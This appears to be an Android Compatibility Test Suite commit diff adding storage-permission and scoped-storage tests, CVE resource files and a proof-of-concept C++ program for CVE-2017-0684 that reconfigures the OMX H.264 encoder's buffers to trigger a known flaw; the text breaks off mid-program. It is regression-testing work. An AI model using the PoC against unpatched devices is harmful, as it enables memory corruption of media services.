Snap for 7132927 from ba3b03ac82e4d3a05b87bc1b29d0da84e3e66901 to mainline-conscrypt-releaseandroid-mainline-11.0.0_r31android-mainline-11.0.0_r20android11-mainline-conscrypt-release

Change-Id: I4f05e80023c21fcf31a74c3b689b4bd3feda9a68

75 files changed, 2486 insertions, 223 deletions

diff --git a/hostsidetests/appsecurity/src/android/appsecurity/cts/ExternalStorageHostTest.java b/hostsidetests/appsecurity/src/android/appsecurity/cts/ExternalStorageHostTest.java
index 4bf764b644d..121e33c52e2 100644
--- a/hostsidetests/appsecurity/src/android/appsecurity/cts/ExternalStorageHostTest.java
+++ b/hostsidetests/appsecurity/src/android/appsecurity/cts/ExternalStorageHostTest.java
@@ -626,6 +626,24 @@ public class ExternalStorageHostTest extends BaseHostJUnit4Test {
     }
 
     @Test
+    public void testMediaEscalation_RequestWriteFilePathSupport() throws Exception {
+        // Not adding tests for MEDIA_28 and MEDIA_29 as they need W_E_S for write access via file
+        // path for shared files, and will always have access as they have W_E_S.
+        installPackage(MEDIA.apk);
+
+        int user = getDevice().getCurrentUser();
+        updatePermissions(MEDIA.pkg, user, new String[] {
+                PERM_READ_EXTERNAL_STORAGE,
+        }, false);
+        updatePermissions(MEDIA.pkg, user, new String[] {
+                PERM_WRITE_EXTERNAL_STORAGE,
+        }, false);
+
+        runDeviceTests(MEDIA.pkg, MEDIA.clazz, "testMediaEscalation_RequestWriteFilePathSupport",
+                user);
+    }
+
+    @Test
     public void testMediaEscalation() throws Exception {
         doMediaEscalation(MEDIA);
     }
diff --git a/hostsidetests/appsecurity/test-apps/DocumentClient/src/com/android/cts/documentclient/DocumentsClientTest.java b/hostsidetests/appsecurity/test-apps/DocumentClient/src/com/android/cts/documentclient/DocumentsClientTest.java
index 106434f20f4..2e785f500f9 100644
--- a/hostsidetests/appsecurity/test-apps/DocumentClient/src/com/android/cts/documentclient/DocumentsClientTest.java
+++ b/hostsidetests/appsecurity/test-apps/DocumentClient/src/com/android/cts/documentclient/DocumentsClientTest.java
@@ -21,6 +21,7 @@ import android.content.ContentResolver;
 import android.content.Intent;
 import android.content.IntentSender;
 import android.database.Cursor;
+import android.graphics.Rect;
 import android.net.Uri;
 import android.os.Bundle;
 import android.os.SystemClock;
@@ -100,9 +101,7 @@ public class DocumentsClientTest extends DocumentsClientTestCase {
     }
 
     private UiObject findDocument(String label) throws UiObjectNotFoundException {
-        final UiSelector docList = new UiSelector().resourceId(
-                getDocumentsUiPackageId() + ":id/container_directory").childSelector(
-                new UiSelector().resourceId(getDocumentsUiPackageId() + ":id/dir_list"));
+        final UiSelector docList = new UiSelector().resourceId(getDocumentsUiPackageId() + ":id/dir_list");
 
         // Wait for the first list item to appear
         assertTrue("First list item",
@@ -117,9 +116,28 @@ public class DocumentsClientTest extends DocumentsClientTestCase {
             //do nothing, already be in list mode.
         }
 
-        // Now scroll around to find our item
-        new UiScrollable(docList).scrollIntoView(new UiSelector().text(label));
-        return new UiObject(docList.childSelector(new UiSelector().text(label)));
+        // Repeat swipe gesture to find our item
+        // (UiScrollable#scrollIntoView does not seem to work well with SwipeRefreshLayout)
+        UiObject targetObject = new UiObject(docList.childSelector(new UiSelector().text(label)));
+        UiObject saveButton = findSaveButton();
+        int stepLimit = 10;
+        while (stepLimit-- > 0) {
+            if (targetObject.exists()) {
+                boolean targetObjectFullyVisible = !saveButton.exists()
+                        || targetObject.getVisibleBounds().bottom
+                        <= saveButton.getVisibleBounds().top;
+                if (targetObjectFullyVisible) {
+                    break;
+                }
+            }
+
+            mDevice.swipe(/* startX= */ mDevice.getDisplayWidth() / 2,
+                    /* startY= */ mDevice.getDisplayHeight() / 2,
+                    /* endX= */ mDevice.getDisplayWidth() / 2,
+                    /* endY= */ 0,
+                    /* steps= */ 40);
+        }
+        return targetObject;
     }
 
     private UiObject findSaveButton() throws UiObjectNotFoundException {
diff --git a/hostsidetests/appsecurity/test-apps/MediaStorageApp/src/com/android/cts/mediastorageapp/MediaStorageTest.java b/hostsidetests/appsecurity/test-apps/MediaStorageApp/src/com/android/cts/mediastorageapp/MediaStorageTest.java
index cf1d8881e7d..48172303f01 100644
--- a/hostsidetests/appsecurity/test-apps/MediaStorageApp/src/com/android/cts/mediastorageapp/MediaStorageTest.java
+++ b/hostsidetests/appsecurity/test-apps/MediaStorageApp/src/com/android/cts/mediastorageapp/MediaStorageTest.java
@@ -404,6 +404,52 @@ public class MediaStorageTest {
     }
 
     @Test
+    public void testMediaEscalation_RequestWriteFilePathSupport() throws Exception {
+        doMediaEscalation_RequestWrite_withFilePathSupport(
+                MediaStorageTest::createAudio);
+        doMediaEscalation_RequestWrite_withFilePathSupport(
+                MediaStorageTest::createVideo);
+        doMediaEscalation_RequestWrite_withFilePathSupport(
+                MediaStorageTest::createImage);
+        doMediaEscalation_RequestWrite_withFilePathSupport(
+                MediaStorageTest::createPlaylist);
+        doMediaEscalation_RequestWrite_withFilePathSupport(
+                MediaStorageTest::createSubtitle);
+    }
+
+    private void doMediaEscalation_RequestWrite_withFilePathSupport(
+            Callable<Uri> create) throws Exception {
+        final Uri red = create.call();
+        assertNotNull(red);
+        String path = queryForSingleColumn(red, MediaColumns.DATA);
+        File file = new File(path);
+        assertTrue(file.exists());
+        assertTrue(file.canRead());
+        assertTrue(file.canWrite());
+
+        clearMediaOwner(red, mUserId);
+        assertFalse(file.canWrite());
+
+        try (ParcelFileDescriptor pfd = mContentResolver.openFileDescriptor(red, "w")) {
+            fail("Expected write access to be blocked");
+        } catch (SecurityException expected) {
+        }
+
+        doEscalation(MediaStore.createWriteRequest(mContentResolver, Arrays.asList(red)));
+
+        try (ParcelFileDescriptor pfd = mContentResolver.openFileDescriptor(red, "w")) {
+        }
+
+        final Instrumentation inst = InstrumentationRegistry.getInstrumentation();
+        final UiDevice device = UiDevice.getInstance(inst);
+        device.executeShellCommand("setprop sys.filepathsupport.mediauri true");
+        assertTrue(file.canRead());
+        assertTrue(file.canWrite());
+        // TODO(b/173648980): Write to file and read back to verify.
+        device.executeShellCommand("setprop sys.filepathsupport.mediauri false");
+    }
+
+    @Test
     public void testMediaEscalation_RequestWrite() throws Exception {
         doMediaEscalation_RequestWrite(MediaStorageTest::createAudio);
         doMediaEscalation_RequestWrite(MediaStorageTest::createVideo);
diff --git a/hostsidetests/bootstats/src/android/bootstats/cts/BootStatsHostTest.java b/hostsidetests/bootstats/src/android/bootstats/cts/BootStatsHostTest.java
index 9bcf2a11816..fb6477d9ebc 100644
--- a/hostsidetests/bootstats/src/android/bootstats/cts/BootStatsHostTest.java
+++ b/hostsidetests/bootstats/src/android/bootstats/cts/BootStatsHostTest.java
@@ -38,7 +38,7 @@ import java.util.LinkedList;
 @RunWith(DeviceJUnit4ClassRunner.class)
 public class BootStatsHostTest implements IDeviceTest {
 
-    private static final long MAX_WAIT_TIME_MS = 30000;
+    private static final long MAX_WAIT_TIME_MS = 100000;
     private static final long WAIT_SLEEP_MS = 100;
 
     private static int[] ATOMS_EXPECTED = {
diff --git a/hostsidetests/scopedstorage/device/src/android/scopedstorage/cts/device/ScopedStorageBaseDeviceTest.java b/hostsidetests/scopedstorage/device/src/android/scopedstorage/cts/device/ScopedStorageBaseDeviceTest.java
new file mode 100644
index 00000000000..5299188e4c7
--- /dev/null
+++ b/hostsidetests/scopedstorage/device/src/android/scopedstorage/cts/device/ScopedStorageBaseDeviceTest.java
@@ -0,0 +1,75 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.scopedstorage.cts.device;
+
+import static android.scopedstorage.cts.lib.TestUtils.getExternalFilesDir;
+import static android.scopedstorage.cts.lib.TestUtils.pollForExternalStorageState;
+import static android.scopedstorage.cts.lib.TestUtils.resetDefaultExternalStorageVolume;
+import static android.scopedstorage.cts.lib.TestUtils.setExternalStorageVolume;
+import static android.scopedstorage.cts.lib.TestUtils.setupDefaultDirectories;
+
+import static androidx.test.InstrumentationRegistry.getContext;
+
+import static com.google.common.truth.Truth.assertThat;
+
+import android.provider.MediaStore;
+import android.scopedstorage.cts.lib.TestUtils;
+
+import org.junit.BeforeClass;
+
+import java.util.Arrays;
+import java.util.List;
+
+class ScopedStorageBaseDeviceTest {
+    @BeforeClass
+    public static void setup() throws Exception {
+        createPublicVolume();
+        setupStorage();
+    }
+
+    private static void createPublicVolume() throws Exception {
+        if (TestUtils.getCurrentPublicVolumeName() == null) {
+            TestUtils.createNewPublicVolume();
+        }
+    }
+
+    private static void setupStorage() throws Exception {
+        if (!getContext().getPackageManager().isInstantApp()) {
+            pollForExternalStorageState();
+            getExternalFilesDir().mkdirs();
+        }
+    }
+
+    void setupExternalStorage(String volumeName) {
+        assertThat(volumeName).isNotNull();
+        if (volumeName.equals(MediaStore.VOLUME_EXTERNAL)) {
+            resetDefaultExternalStorageVolume();
+            TestUtils.assertDefaultVolumeIsPrimary();
+        } else {
+            setExternalStorageVolume(volumeName);
+            TestUtils.assertDefaultVolumeIsPublic();
+        }
+        setupDefaultDirectories();
+    }
+
+    static List<String> getTestParameters() {
+        return Arrays.asList(
+                MediaStore.VOLUME_EXTERNAL,
+                TestUtils.getCurrentPublicVolumeName()
+        );
+    }
+}
diff --git a/hostsidetests/scopedstorage/device/src/android/scopedstorage/cts/device/ScopedStorageDeviceTest.java b/hostsidetests/scopedstorage/device/src/android/scopedstorage/cts/device/ScopedStorageDeviceTest.java
index 6c80563119a..966f96d82c3 100644
--- a/hostsidetests/scopedstorage/device/src/android/scopedstorage/cts/device/ScopedStorageDeviceTest.java
+++ b/hostsidetests/scopedstorage/device/src/android/scopedstorage/cts/device/ScopedStorageDeviceTest.java
@@ -74,7 +74,6 @@ import static android.scopedstorage.cts.lib.TestUtils.installAppWithStoragePermi
 import static android.scopedstorage.cts.lib.TestUtils.isAppInstalled;
 import static android.scopedstorage.cts.lib.TestUtils.listAs;
 import static android.scopedstorage.cts.lib.TestUtils.openWithMediaProvider;
-import static android.scopedstorage.cts.lib.TestUtils.pollForExternalStorageState;
 import static android.scopedstorage.cts.lib.TestUtils.queryFile;
 import static android.scopedstorage.cts.lib.TestUtils.queryFileExcludingPending;
 import static android.scopedstorage.cts.lib.TestUtils.queryImageFile;
@@ -82,7 +81,6 @@ import static android.scopedstorage.cts.lib.TestUtils.queryVideoFile;
 import static android.scopedstorage.cts.lib.TestUtils.readExifMetadataFromTestApp;
 import static android.scopedstorage.cts.lib.TestUtils.revokePermission;
 import static android.scopedstorage.cts.lib.TestUtils.setAttrAs;
-import static android.scopedstorage.cts.lib.TestUtils.setupDefaultDirectories;
 import static android.scopedstorage.cts.lib.TestUtils.uninstallApp;
 import static android.scopedstorage.cts.lib.TestUtils.uninstallAppNoThrow;
 import static android.scopedstorage.cts.lib.TestUtils.updateDisplayNameWithMediaProvider;
@@ -119,14 +117,12 @@ import android.os.FileUtils;
 import android.os.ParcelFileDescriptor;
 import android.os.Process;
 import android.provider.MediaStore;
-import android.scopedstorage.cts.lib.TestUtils;
 import android.system.ErrnoException;
 import android.system.Os;
 import android.system.StructStat;
 import android.util.Log;
 
 import androidx.annotation.Nullable;
-import androidx.test.runner.AndroidJUnit4;
 
 import com.android.cts.install.lib.TestApp;
 
@@ -137,6 +133,9 @@ import org.junit.Before;
 import org.junit.BeforeClass;
 import org.junit.Test;
 import org.junit.runner.RunWith;
+import org.junit.runners.Parameterized;
+import org.junit.runners.Parameterized.Parameter;
+import org.junit.runners.Parameterized.Parameters;
 
 import java.io.File;
 import java.io.FileDescriptor;
@@ -153,8 +152,8 @@ import java.util.List;
 /**
  * Device-side test suite to verify scoped storage business logic.
  */
-@RunWith(AndroidJUnit4.class)
-public class ScopedStorageDeviceTest {
+@RunWith(Parameterized.class)
+public class ScopedStorageDeviceTest extends ScopedStorageBaseDeviceTest {
     public static final String STR_DATA1 = "Just some random text";
 
     public static final byte[] BYTES_DATA1 = STR_DATA1.getBytes();
@@ -209,20 +208,12 @@ public class ScopedStorageDeviceTest {
     private static final String OPSTR_MANAGE_EXTERNAL_STORAGE =
             permissionToOp(Manifest.permission.MANAGE_EXTERNAL_STORAGE);
 
-    @BeforeClass
-    public static void verifyTestsWillRunOnPrimaryVolume() throws Exception {
-        TestUtils.resetDefaultExternalStorageVolume();
-        TestUtils.assertDefaultVolumeIsPrimary();
-    }
+    @Parameter(0)
+    public String mVolumeName;
 
-    @BeforeClass
-    public static void createPublicVolume() throws Exception {
-        // Create a public volume. It's not used in this test right now, but it makes for a less
-        // flaky test to create here. ScopedStoragePublicVolumeDeviceTest will be folded into
-        // this test later, as a prametererized option, as tracked in b/159593019.
-        if (TestUtils.getCurrentPublicVolumeName() == null) {
-            TestUtils.createNewPublicVolume();
-        }
+    @Parameters
+    public static Iterable<? extends Object> data() {
+        return ScopedStorageDeviceTest.getTestParameters();
     }
 
     @BeforeClass
@@ -245,14 +236,6 @@ public class ScopedStorageDeviceTest {
                 Manifest.permission.WRITE_EXTERNAL_STORAGE)).isTrue();
     }
 
-    @BeforeClass
-    public static void setupStorage() throws Exception {
-        if (!getContext().getPackageManager().isInstantApp()) {
-            pollForExternalStorageState();
-            getExternalFilesDir().mkdirs();
-        }
-    }
-
     @After
     public void tearDown() throws Exception {
         executeShellCommand("rm -r /sdcard/Android/data/com.android.shell");
@@ -260,7 +243,8 @@ public class ScopedStorageDeviceTest {
 
     @Before
     public void setupExternalStorage() {
-        setupDefaultDirectories();
+        super.setupExternalStorage(mVolumeName);
+        Log.i(TAG, "Using volume : " + mVolumeName);
     }
 
     /**
@@ -1113,6 +1097,36 @@ public class ScopedStorageDeviceTest {
         }
     }
 
+    @Test
+    public void testInsertDefaultPrimaryCaseInsensitiveCheck() throws Exception {
+        final File podcastsDir = getPodcastsDir();
+        final File podcastsDirLowerCase =
+                new File(getExternalStorageDir(), Environment.DIRECTORY_PODCASTS.toLowerCase());
+        final File fileInPodcastsDirLowerCase = new File(podcastsDirLowerCase, AUDIO_FILE_NAME);
+        try {
+            // Delete the directory if it already exists
+            if (podcastsDir.exists()) {
+                deleteAsLegacyApp(podcastsDir);
+            }
+            assertThat(podcastsDir.exists()).isFalse();
+            assertThat(podcastsDirLowerCase.exists()).isFalse();
+
+            // Create the directory with lower case
+            assertThat(podcastsDirLowerCase.mkdir()).isTrue();
+            // Because of case-insensitivity, even though directory is created
+            // with lower case, we should be able to see both directory names.
+            assertThat(podcastsDirLowerCase.exists()).isTrue();
+            assertThat(podcastsDir.exists()).isTrue();
+
+            // File creation with lower case path of podcasts directory should not fail
+            assertThat(fileInPodcastsDirLowerCase.createNewFile()).isTrue();
+        } finally {
+            fileInPodcastsDirLowerCase.delete();
+            deleteAsLegacyApp(podcastsDirLowerCase);
+            podcastsDir.mkdirs();
+        }
+    }
+
     private void createDeleteCreate(File create, File delete) throws Exception {
         try {
             assertThat(create.createNewFile()).isTrue();
diff --git a/hostsidetests/scopedstorage/device/src/android/scopedstorage/cts/device/ScopedStoragePublicVolumeDeviceTest.java b/hostsidetests/scopedstorage/device/src/android/scopedstorage/cts/device/ScopedStoragePublicVolumeDeviceTest.java
deleted file mode 100644
index 20f4274e7c6..00000000000
--- a/hostsidetests/scopedstorage/device/src/android/scopedstorage/cts/device/ScopedStoragePublicVolumeDeviceTest.java
+++ /dev/null
@@ -1,58 +0,0 @@
-/*
- * Copyright (C) 2020 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- *      http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-
-package android.scopedstorage.cts.device;
-
-import static com.google.common.truth.Truth.assertThat;
-
-import android.scopedstorage.cts.lib.TestUtils;
-
-import androidx.test.runner.AndroidJUnit4;
-
-import org.junit.AfterClass;
-import org.junit.BeforeClass;
-import org.junit.runner.RunWith;
-
-/**
- * Test suite to run ScopedStorageDeviceTest on a public volume.
- */
-@RunWith(AndroidJUnit4.class)
-public class ScopedStoragePublicVolumeDeviceTest extends ScopedStorageDeviceTest {
-
-    @BeforeClass
-    public static void createPublicVolume() throws Exception {
-        ScopedStorageDeviceTest.createPublicVolume();
-    }
-
-    @BeforeClass
-    public static void setupApps() throws Exception {
-        ScopedStorageDeviceTest.setupApps();
-    }
-
-    @AfterClass
-    public static void resetDefaultVolume() throws Exception {
-        TestUtils.resetDefaultExternalStorageVolume();
-    }
-
-    @BeforeClass
-    public static void setupStorage() throws Exception {
-        String volumeName = TestUtils.getPublicVolumeName();
-        assertThat(volumeName).isNotNull();
-        TestUtils.setExternalStorageVolume(volumeName);
-        TestUtils.assertDefaultVolumeIsPublic();
-        ScopedStorageDeviceTest.setupStorage();
-    }
-}
diff --git a/hostsidetests/scopedstorage/host/src/android/scopedstorage/cts/host/ScopedStorageHostTest.java b/hostsidetests/scopedstorage/host/src/android/scopedstorage/cts/host/ScopedStorageHostTest.java
index 91e0915a304..26be94c0bdc 100644
--- a/hostsidetests/scopedstorage/host/src/android/scopedstorage/cts/host/ScopedStorageHostTest.java
+++ b/hostsidetests/scopedstorage/host/src/android/scopedstorage/cts/host/ScopedStorageHostTest.java
@@ -105,6 +105,16 @@ public class ScopedStorageHostTest extends BaseHostTestCase {
     }
 
     @Test
+    public void testManageExternalStorageCannotRenameAndroid() throws Exception {
+        allowAppOps("android:manage_external_storage");
+        try {
+            runDeviceTest("testManageExternalStorageCannotRenameAndroid");
+        } finally {
+            denyAppOps("android:manage_external_storage");
+        }
+    }
+
+    @Test
     public void testManageExternalStorageCantReadWriteOtherAppExternalDir() throws Exception {
         allowAppOps("android:manage_external_storage");
         try {
diff --git a/hostsidetests/scopedstorage/libs/ScopedStorageTestLib/src/android/scopedstorage/cts/lib/TestUtils.java b/hostsidetests/scopedstorage/libs/ScopedStorageTestLib/src/android/scopedstorage/cts/lib/TestUtils.java
index 8d25bc421a5..80a90c18b10 100644
--- a/hostsidetests/scopedstorage/libs/ScopedStorageTestLib/src/android/scopedstorage/cts/lib/TestUtils.java
+++ b/hostsidetests/scopedstorage/libs/ScopedStorageTestLib/src/android/scopedstorage/cts/lib/TestUtils.java
@@ -21,6 +21,7 @@ import static android.scopedstorage.cts.lib.RedactionTestHelper.EXIF_METADATA_QU
 import static androidx.test.InstrumentationRegistry.getContext;
 
 import static com.google.common.truth.Truth.assertThat;
+import static com.google.common.truth.Truth.assertWithMessage;
 
 import static org.junit.Assert.fail;
 
@@ -123,8 +124,10 @@ public class TestUtils {
      */
     public static void setupDefaultDirectories() {
         for (File dir : getDefaultTopLevelDirs()) {
-            dir.mkdir();
-            assertThat(dir.exists()).isTrue();
+            dir.mkdirs();
+            assertWithMessage("Could not setup default dir [%s]", dir.toString())
+                    .that(dir.exists())
+                    .isTrue();
         }
     }
 
diff --git a/hostsidetests/scopedstorage/src/android/scopedstorage/cts/ScopedStorageTest.java b/hostsidetests/scopedstorage/src/android/scopedstorage/cts/ScopedStorageTest.java
index 0f0447fbd63..be8dec65ebe 100644
--- a/hostsidetests/scopedstorage/src/android/scopedstorage/cts/ScopedStorageTest.java
+++ b/hostsidetests/scopedstorage/src/android/scopedstorage/cts/ScopedStorageTest.java
@@ -369,6 +369,15 @@ public class ScopedStorageTest {
     }
 
     @Test
+    public void testManageExternalStorageCannotRenameAndroid() throws Exception {
+        pollForManageExternalStorageAllowed();
+
+        final File androidDir = getAndroidDir();
+        final File fooDir = new File(getAndroidDir().getAbsolutePath() + "foo");
+        assertThat(androidDir.renameTo(fooDir)).isFalse();
+    }
+
+    @Test
     public void testManageExternalStorageReaddir() throws Exception {
         pollForManageExternalStorageAllowed();
 
diff --git a/hostsidetests/securitybulletin/res/cve_2017_0726.mp4 b/hostsidetests/securitybulletin/res/cve_2017_0726.mp4
new file mode 100644
index 00000000000..2e30e91d1cd
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/cve_2017_0726.mp4
diff --git a/hostsidetests/securitybulletin/res/cve_2020_0381.info b/hostsidetests/securitybulletin/res/cve_2020_0381.info
new file mode 100644
index 00000000000..510c136cc08
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/cve_2020_0381.info
diff --git a/hostsidetests/securitybulletin/res/cve_2020_0381.xmf b/hostsidetests/securitybulletin/res/cve_2020_0381.xmf
new file mode 100644
index 00000000000..cbe4bbc75ed
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/cve_2020_0381.xmf
diff --git a/hostsidetests/securitybulletin/res/cve_2020_0384.info b/hostsidetests/securitybulletin/res/cve_2020_0384.info
new file mode 100644
index 00000000000..e74b507b210
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/cve_2020_0384.info
diff --git a/hostsidetests/securitybulletin/res/cve_2020_0384.xmf b/hostsidetests/securitybulletin/res/cve_2020_0384.xmf
new file mode 100644
index 00000000000..5056ce39a6b
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/cve_2020_0384.xmf
diff --git a/hostsidetests/securitybulletin/res/cve_2020_0385.info b/hostsidetests/securitybulletin/res/cve_2020_0385.info
new file mode 100644
index 00000000000..f0d0459372e
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/cve_2020_0385.info
diff --git a/hostsidetests/securitybulletin/res/cve_2020_0385.xmf b/hostsidetests/securitybulletin/res/cve_2020_0385.xmf
new file mode 100644
index 00000000000..6437f9e7bb2
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/cve_2020_0385.xmf
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-0684/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0684/Android.bp
new file mode 100644
index 00000000000..ad70e63e8b8
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0684/Android.bp
@@ -0,0 +1,44 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+cc_test {
+    name: "CVE-2017-0684",
+    defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+    srcs: [
+        "poc.cpp",
+        ":cts_hostsidetests_securitybulletin_omxutils",
+    ],
+    shared_libs: [
+        "libstagefright",
+        "libbinder",
+        "libmedia_omx",
+        "libutils",
+        "liblog",
+        "libui",
+        "libstagefright_foundation",
+        "libcutils",
+        "libhidlbase",
+        "libhidlmemory",
+        "android.hidl.allocator@1.0",
+        "android.hardware.media.omx@1.0",
+    ],
+    include_dirs: [
+        "frameworks/native/include/media/openmax",
+        "frameworks/av/media/libstagefright",
+        "frameworks/native/include/media/hardware",
+    ],
+    compile_multilib: "32",
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-0684/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0684/poc.cpp
new file mode 100644
index 00000000000..9b76c7b3b2a
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0684/poc.cpp
@@ -0,0 +1,139 @@
+/**
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <stdlib.h>
+#include "../includes/common.h"
+#include "../includes/omxUtils.h"
+
+sp<IAllocator> mAllocator = IAllocator::getService("ashmem");
+
+int allocateHidlPortBuffers(OMX_U32 portIndex,
+                        Vector<Buffer> *buffers) {
+    buffers->clear();
+    OMX_PARAM_PORTDEFINITIONTYPE def;
+    int err = omxUtilsGetParameter(portIndex, &def);
+    omxExitOnError(err);
+    for (OMX_U32 i = 0; i < def.nBufferCountActual; ++i) {
+        Buffer buffer;
+        buffer.mFlags = 0;
+        bool success;
+        auto transStatus = mAllocator->allocate(def.nBufferSize,
+                                                [&success, &buffer](
+                                                        bool s,
+                                                        hidl_memory const& m) {
+                                                    success = s;
+                                                    buffer.mHidlMemory = m;
+                                                });
+        omxExitOnError(!transStatus.isOk());
+        omxExitOnError(!success);
+        omxUtilsUseBuffer(portIndex, buffer.mHidlMemory, &buffer.mID);
+        buffers->push(buffer);
+    }
+    return OK;
+}
+
+int main() {
+
+    /* Initialize OMX for the specified codec                            */
+    status_t ret = omxUtilsInit((char *) "OMX.google.h264.encoder");
+    omxExitOnError(ret);
+    /* Get OMX input port parameters                                     */
+    OMX_PARAM_PORTDEFINITIONTYPE *params =
+            (OMX_PARAM_PORTDEFINITIONTYPE *) malloc(
+                    sizeof(OMX_PARAM_PORTDEFINITIONTYPE));
+    memset(params, 0, sizeof(OMX_PARAM_PORTDEFINITIONTYPE));
+    omxUtilsGetParameter(OMX_UTILS_IP_PORT, params);
+    int ipBufferCount = params->nBufferCountActual;
+    /* Set port mode */
+    omxUtilsSetPortMode(OMX_UTILS_IP_PORT, IOMX::kPortModeDynamicANWBuffer);
+    /* Allocate input buffers and graphic buffer                         */
+    sp<GraphicBuffer> graphicbuffer = new GraphicBuffer(
+            params->format.video.nFrameWidth, params->format.video.nFrameHeight,
+            HAL_PIXEL_FORMAT_RGBX_8888,
+            android::GraphicBuffer::USAGE_HW_VIDEO_ENCODER, "me");
+    int i;
+    Vector<Buffer> inputBuffers;
+    Vector<Buffer> outputBuffers;
+    /* Register input buffers with OMX component                         */
+    allocateHidlPortBuffers(OMX_UTILS_IP_PORT, &inputBuffers);
+    /* Get OMX output port parameters                                    */
+    memset(params, 0, sizeof(OMX_PARAM_PORTDEFINITIONTYPE));
+    omxUtilsGetParameter(OMX_UTILS_OP_PORT, params);
+    int opBufferSize = params->nBufferSize;
+    int opBufferCount = params->nBufferCountActual;
+    allocateHidlPortBuffers(OMX_UTILS_OP_PORT, &outputBuffers);
+    /* Do OMX State chage to Idle                                        */
+    omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateIdle);
+    /* Do OMX State chage to Executing                                   */
+    omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateExecuting);
+    /* Empty input buffers and fill output buffers                       */
+    OMXBuffer omxIpBuf(graphicbuffer);
+    omxUtilsEmptyBuffer(inputBuffers[0].mID, omxIpBuf, 0, 0, -1);
+    OMXBuffer omxOpBuf(0, opBufferSize);
+    omxUtilsFillBuffer(outputBuffers[0].mID, omxOpBuf, -1);
+    /* Do OMX State chage to Idle                                        */
+    omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateIdle);
+    /* Do OMX State chage to Loaded                                      */
+    omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateLoaded);
+    /* Free input and output buffers                                     */
+    for (i = 0; i < ipBufferCount; i++) {
+        omxUtilsFreeBuffer(OMX_UTILS_IP_PORT, inputBuffers[i].mID);
+    }
+    for (i = 0; i < opBufferCount; i++) {
+        omxUtilsFreeBuffer(OMX_UTILS_OP_PORT, outputBuffers[i].mID);
+    }
+    /*********************************************************************/
+    /* Following code exposes vulnerability                              */
+    /*********************************************************************/
+    Vector<Buffer> newInputBuffers;
+    Vector<Buffer> newOutputBuffers;
+    /* Get OMX input port parameters, change settings and set output port*/
+    /* port parameters                                                   */
+    memset(params, 0, sizeof(OMX_PARAM_PORTDEFINITIONTYPE));
+    omxUtilsGetParameter(OMX_UTILS_IP_PORT, params);
+    params->nBufferSize = 38016;
+    params->format.video.nFrameWidth = 2000;
+    params->format.video.nFrameHeight = 2000;
+    omxUtilsSetParameter(OMX_UTILS_IP_PORT, params);
+    /* Allocated input buffers and register with OMX component           */
+    allocateHidlPortBuffers(OMX_UTILS_IP_PORT, &newInputBuffers);
+    /* Allocated output buffers and register with OMX component          */
+    allocateHidlPortBuffers(OMX_UTILS_OP_PORT, &newOutputBuffers);
+    /* Do OMX State chage to Idle                                        */
+    omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateIdle);
+    /* Do OMX State chage to Executing                                   */
+    omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateExecuting);
+    /* Empty input buffers and fill output buffers                       */
+    OMXBuffer newOmxIpBuf(graphicbuffer);
+    omxUtilsEmptyBuffer(newInputBuffers[0].mID, newOmxIpBuf, 0, 0, -1);
+    OMXBuffer newOmxOpBuf(0, opBufferSize);
+    omxUtilsFillBuffer(newOutputBuffers[0].mID, newOmxOpBuf, -1);
+    /* Do OMX State change to Idle                                         */
+    omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateIdle);
+    /* Do OMX State change to Loaded                                       */
+    omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateLoaded);
+    /* Free input and output buffers                                       */
+    for (i = 0; i < ipBufferCount; i++) {
